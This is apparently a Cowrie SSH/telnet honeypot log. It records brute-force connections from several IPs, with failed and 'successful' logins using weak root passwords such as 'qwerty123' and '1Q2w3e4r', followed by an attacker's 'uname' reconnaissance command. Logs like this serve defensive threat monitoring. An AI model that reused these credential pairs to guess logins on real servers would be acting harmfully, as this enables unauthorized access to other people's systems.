{"eventid":"cowrie.session.closed","duration":180.11523413658142,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:08.682953Z","src_ip":"212.227.125.160","session":"59bfaff0ce0e"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":49117,"dst_ip":"1.2.3.4","dst_port":22,"session":"a970760f1fcc","protocol":"ssh","message":"New connection: 45.125.211.194:49117 (1.2.3.4:22) [session: a970760f1fcc]","sensor":"my-vps","timestamp":"2025-08-28T03:22:13.333135Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:22:13.340690Z","src_ip":"45.125.211.194","session":"a970760f1fcc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:22:13.543375Z","src_ip":"45.125.211.194","session":"a970760f1fcc"}
{"eventid":"cowrie.login.failed","username":"ts","password":"ts","message":"login attempt [ts/ts] failed","sensor":"my-vps","timestamp":"2025-08-28T03:22:14.382543Z","src_ip":"45.125.211.194","session":"a970760f1fcc"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:15.595297Z","src_ip":"45.125.211.194","session":"a970760f1fcc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51424,"dst_ip":"1.2.3.4","dst_port":23,"session":"e3164ef6e4ec","protocol":"telnet","message":"New connection: 212.227.235.229:51424 (1.2.3.4:23) [session: e3164ef6e4ec]","sensor":"my-vps","timestamp":"2025-08-28T03:22:17.713626Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49930,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae1b76946828","protocol":"ssh","message":"New connection: 212.227.235.229:49930 (1.2.3.4:22) [session: ae1b76946828]","sensor":"my-vps","timestamp":"2025-08-28T03:22:20.670026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:22:20.670860Z","src_ip":"212.227.235.229","session":"ae1b76946828"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:22:20.916111Z","src_ip":"212.227.235.229","session":"ae1b76946828"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty123","message":"login attempt [root/qwerty123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:22:21.654928Z","src_ip":"212.227.235.229","session":"ae1b76946828"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:22:22.165722Z","src_ip":"212.227.235.229","session":"ae1b76946828"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:22:22.166383Z","src_ip":"212.227.235.229","session":"ae1b76946828"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:22.413209Z","src_ip":"212.227.235.229","session":"ae1b76946828"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:22.414252Z","src_ip":"212.227.235.229","session":"ae1b76946828"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":30404,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8b47a6303ac","protocol":"ssh","message":"New connection: 45.125.211.194:30404 (1.2.3.4:22) [session: f8b47a6303ac]","sensor":"my-vps","timestamp":"2025-08-28T03:22:28.171251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:22:28.175671Z","src_ip":"45.125.211.194","session":"f8b47a6303ac"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:22:28.445510Z","src_ip":"45.125.211.194","session":"f8b47a6303ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40605,"dst_ip":"1.2.3.4","dst_port":23,"session":"4a68ab5950e9","protocol":"telnet","message":"New connection: 212.227.125.160:40605 (1.2.3.4:23) [session: 4a68ab5950e9]","sensor":"my-vps","timestamp":"2025-08-28T03:22:29.252193Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty","message":"login attempt [root/Qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:22:29.276833Z","src_ip":"45.125.211.194","session":"f8b47a6303ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59922,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9ccd92439a5","protocol":"ssh","message":"New connection: 212.227.125.160:59922 (1.2.3.4:22) [session: a9ccd92439a5]","sensor":"my-vps","timestamp":"2025-08-28T03:22:29.415839Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:29.416964Z","src_ip":"212.227.125.160","session":"a9ccd92439a5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:22:29.850460Z","src_ip":"45.125.211.194","session":"f8b47a6303ac"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:22:29.851318Z","src_ip":"45.125.211.194","session":"f8b47a6303ac"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:30.074237Z","src_ip":"45.125.211.194","session":"f8b47a6303ac"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:30.075410Z","src_ip":"45.125.211.194","session":"f8b47a6303ac"}
{"eventid":"cowrie.session.closed","duration":13.051253080368042,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:30.764808Z","src_ip":"212.227.235.229","session":"e3164ef6e4ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42574,"dst_ip":"1.2.3.4","dst_port":22,"session":"d663bbd432c7","protocol":"ssh","message":"New connection: 212.227.235.229:42574 (1.2.3.4:22) [session: d663bbd432c7]","sensor":"my-vps","timestamp":"2025-08-28T03:22:32.134502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:22:32.135194Z","src_ip":"212.227.235.229","session":"d663bbd432c7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:22:32.382112Z","src_ip":"212.227.235.229","session":"d663bbd432c7"}
{"eventid":"cowrie.login.failed","username":"test","password":"abc123","message":"login attempt [test/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:22:33.124578Z","src_ip":"212.227.235.229","session":"d663bbd432c7"}
{"eventid":"cowrie.session.closed","duration":30.933982372283936,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:34.171589Z","src_ip":"86.57.152.52","session":"69314b9aeb67"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:34.373407Z","src_ip":"212.227.235.229","session":"d663bbd432c7"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":35742,"dst_ip":"1.2.3.4","dst_port":22,"session":"6213c82f515f","protocol":"ssh","message":"New connection: 194.233.79.134:35742 (1.2.3.4:22) [session: 6213c82f515f]","sensor":"my-vps","timestamp":"2025-08-28T03:22:40.962043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:22:41.259152Z","src_ip":"194.233.79.134","session":"6213c82f515f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52568,"dst_ip":"1.2.3.4","dst_port":22,"session":"eac829fcab80","protocol":"ssh","message":"New connection: 212.227.125.160:52568 (1.2.3.4:22) [session: eac829fcab80]","sensor":"my-vps","timestamp":"2025-08-28T03:22:41.398753Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:22:41.399837Z","src_ip":"212.227.125.160","session":"eac829fcab80"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:22:41.614089Z","src_ip":"212.227.125.160","session":"eac829fcab80"}
{"eventid":"cowrie.session.closed","duration":12.904170989990234,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:42.156262Z","src_ip":"212.227.125.160","session":"4a68ab5950e9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:22:42.159072Z","src_ip":"194.233.79.134","session":"6213c82f515f"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2w3e4r","message":"login attempt [root/1Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:22:42.260327Z","src_ip":"212.227.125.160","session":"eac829fcab80"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:22:42.773926Z","src_ip":"212.227.125.160","session":"eac829fcab80"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:22:42.774598Z","src_ip":"212.227.125.160","session":"eac829fcab80"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":12676,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7c3a591501c","protocol":"ssh","message":"New connection: 45.125.211.194:12676 (1.2.3.4:22) [session: d7c3a591501c]","sensor":"my-vps","timestamp":"2025-08-28T03:22:42.963803Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:22:42.967861Z","src_ip":"45.125.211.194","session":"d7c3a591501c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:42.990430Z","src_ip":"212.227.125.160","session":"eac829fcab80"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:42.991661Z","src_ip":"212.227.125.160","session":"eac829fcab80"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:22:43.174991Z","src_ip":"45.125.211.194","session":"d7c3a591501c"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"abc123","message":"login attempt [ftpuser/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:22:44.013221Z","src_ip":"45.125.211.194","session":"d7c3a591501c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35220,"dst_ip":"1.2.3.4","dst_port":22,"session":"a137a9970f66","protocol":"ssh","message":"New connection: 212.227.235.229:35220 (1.2.3.4:22) [session: a137a9970f66]","sensor":"my-vps","timestamp":"2025-08-28T03:22:44.165990Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:22:44.166728Z","src_ip":"212.227.235.229","session":"a137a9970f66"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:22:44.425402Z","src_ip":"212.227.235.229","session":"a137a9970f66"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2w3e4r","message":"login attempt [root/1Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:22:45.204709Z","src_ip":"212.227.235.229","session":"a137a9970f66"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:45.224048Z","src_ip":"45.125.211.194","session":"d7c3a591501c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:22:45.742257Z","src_ip":"212.227.235.229","session":"a137a9970f66"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:22:45.743033Z","src_ip":"212.227.235.229","session":"a137a9970f66"}
{"eventid":"cowrie.login.success","username":"root","password":"qq123456","message":"login attempt [root/qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:22:45.805873Z","src_ip":"194.233.79.134","session":"6213c82f515f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:46.002856Z","src_ip":"212.227.235.229","session":"a137a9970f66"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:22:46.004810Z","src_ip":"212.227.235.229","session":"a137a9970f66"}
